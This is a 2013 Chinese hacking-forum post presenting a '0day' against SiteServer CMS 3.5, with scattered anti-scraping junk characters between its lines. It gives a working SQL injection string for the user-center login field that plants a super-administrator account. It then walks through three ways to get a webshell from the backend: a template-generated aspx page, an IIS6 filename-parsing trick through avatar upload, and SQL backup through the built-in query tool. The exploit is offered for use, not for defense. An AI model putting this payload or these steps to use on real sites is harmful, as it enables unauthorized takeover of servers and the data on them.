找回密码
 立即注册
查看: 2549|回复: 0
打印 上一主题 下一主题

SiteServer CMS 0Day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:10:58 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
经测试秒杀最新的3.5版
" Z! B4 ~& k5 T% \8 C1 a  u. t7 V; y' i8 ~& p
stieserver官网:www.siteserver.cn! y  {  `; C5 H+ f/ Z
& b( n0 J0 y! Q& V0 I
) G! s9 |! @* K3 a2 b- }8 j- f8 N9 X8 V
2 Q& y% r7 H2 ^
EXP:
2 b' \+ l4 i1 ?0 t  t
$ }' Y' r2 D2 F) `; l直接访问UserCenter/login.aspx9 P0 T, i% Z7 D' `' S! {$ D
0 p! l, m. N1 ~; y
8 B9 o8 t9 w4 _) Q5 z- ?- b* T
7 ]- X* S' G; c1 J  {0 X5 h
用户名处输入:2 _9 K7 S" }4 p. y; H: y" ~, I
3 i8 d4 X! @0 C" Q0 d3 S
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--; r  c2 I5 d7 O& o' n# j0 u6 @, U

0 r7 y5 ]  [9 \ # o3 |( S% i/ H# q6 y
: |, e0 r1 L! c& x5 T! r1 d
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
5 U! g; t2 Y8 M  K* [1 v
! D( W: `$ t. K; C9 \3 y " ~7 a# w6 B9 X. n, T1 ]

' k9 o# R) o/ @9 l之后再访问后台SiteServer/login.aspx用插入的用户登陆- V+ W* d6 B* I+ E' D& M+ E

4 P" E1 H9 l/ k" ~+ l   U3 e4 P. d3 K2 |

2 }  ?3 Y! [- j5 ]( F% k后台拿webshell的三种方法:
# f: D$ L6 [9 m+ o+ K6 \* J- `
8 t% v4 [( `# o1 p# G% H+ [) \一、. }0 S" e# c5 r3 Y- z1 v* Z- z0 ^: O
5 _. ~4 s( }8 |  Y: f& v; A8 v
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx* |2 [8 E  l. i5 N1 i
8 i! p* B  i2 C; k& u* p
二、6 W$ x2 \8 j5 u& {3 n# h

: C- h$ Y$ ^' N* M% C; q成员权限-》添加用户-》用户名为:1.asp' a+ }# A! N1 ~( v" z

- r9 }2 y1 u) V# G8 ^& Q' G, qhttp://127.0.0.1/usercenter/
9 ]% L' t, t8 o: T# ^* V
" {5 R1 E8 l* ]- z用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell  M, o9 `  C2 [( F/ C9 \
( F; U' H! k& V* D$ F
(ps:后台添加用户时不会验证是否含有非法字符)
; b+ M( k8 w$ \" p
1 q1 W: M; |$ R( y' c: t三、
9 x' H+ |0 S& Z; z6 f) `. s0 y" E( {/ [" c# ?: y( w( w7 G( ]
系统工具-》实用工具-》机器参数查看
' f+ J/ k- o! Y: t2 S可以看到数据库类型、名称,WEB路径: i# {2 h: I& A: W  k

" v; L( ^' G3 ?' i2 P0 z系统工具-》数据库工具-》SQL语句查询
5 M2 s1 }( M& d  Q# I, }1 B6 @% Y这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
! J$ n. }8 ?& B3 g  D4 J; k- N" p: z  s3 N9 M
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表